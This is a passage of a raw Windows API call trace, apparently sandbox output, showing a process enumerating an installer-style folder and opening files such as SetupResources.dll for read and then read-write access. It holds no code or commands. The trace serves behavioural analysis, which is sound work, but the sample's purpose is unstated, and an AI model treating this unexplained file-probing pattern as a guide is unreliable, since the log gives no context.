nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0061.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0061.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0061.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0061.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0061.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0061.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0061.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0061.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0061.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0061.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0061.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0061.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0061.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0061.771] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.771] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.771] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.771] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0061.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0061.771] AreFileApisANSI () returned 1 [0061.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\2070\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\2070\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0061.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.771] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.771] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0061.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0061.771] AreFileApisANSI () returned 1 [0061.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0061.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 46 [0061.771] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.772] GetFileType (hFile=0x41c) returned 0x1 [0061.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.772] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.772] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.772] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.772] CloseHandle (hObject=0x41c) returned 1 [0061.772] AreFileApisANSI () returned 1 [0061.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71bd0 [0061.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x71bd0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 46 [0061.773] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.773] GetFileType (hFile=0x41c) returned 0x1 [0061.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0061.773] CloseHandle (hObject=0x41c) returned 1 [0061.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0061.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0061.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0061.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0061.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0061.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0061.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0061.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0061.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.774] AreFileApisANSI () returned 1 [0061.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71620 [0061.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned 46 [0061.774] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\2070\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2070\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958)) returned 1 [0061.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0061.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.774] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.774] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.774] FindNextFileW (in: hFindFile=0x78010, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x5a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x46670, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x5a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ce", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓䥘")) returned 0 [0061.774] FindClose (in: hFindFile=0x78010 | out: hFindFile=0x78010) returned 1 [0061.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0061.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0061.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0061.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0061.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0061.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0061.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0061.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0061.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0061.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0061.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0061.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0061.775] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.775] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.775] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.775] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0061.775] AreFileApisANSI () returned 1 [0061.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\3076", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\3076", lpUsedDefaultChar=0x0) returned 27 [0061.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0061.775] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.775] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0061.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0061.775] AreFileApisANSI () returned 1 [0061.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78550 [0061.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x78550, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076") returned 27 [0061.775] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076" (normalized: "c:\\588bce7c90097ed212\\3076"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.776] GetLastError () returned 0x5 [0061.776] GetLastError () returned 0x5 [0061.776] SetLastError (dwErrCode=0x5) [0061.776] GetLastError () returned 0x5 [0061.776] SetLastError (dwErrCode=0x5) [0061.776] GetLastError () returned 0x5 [0061.776] SetLastError (dwErrCode=0x5) [0061.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78550 | out: hHeap=0x20000) returned 1 [0061.776] AreFileApisANSI () returned 1 [0061.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78710 [0061.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x78710, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3076") returned 27 [0061.776] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076" (normalized: "c:\\588bce7c90097ed212\\3076"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.776] GetLastError () returned 0x5 [0061.776] GetLastError () returned 0x5 [0061.776] SetLastError (dwErrCode=0x5) [0061.776] GetLastError () returned 0x5 [0061.776] SetLastError (dwErrCode=0x5) [0061.776] GetLastError () returned 0x5 [0061.776] SetLastError (dwErrCode=0x5) [0061.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78710 | out: hHeap=0x20000) returned 1 [0061.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0061.776] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.776] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.776] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.776] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x690d0 [0061.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0061.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0061.777] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="3082", cAlternateFileName="")) returned 1 [0061.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0061.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0061.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0061.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0061.777] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\3076\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x77fd0 [0061.777] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.777] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x18a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0061.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0061.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0061.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0061.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0061.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0061.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0061.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0061.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0061.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46668 [0061.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0061.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0061.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0061.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0061.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0061.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71688 [0061.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0061.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0061.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 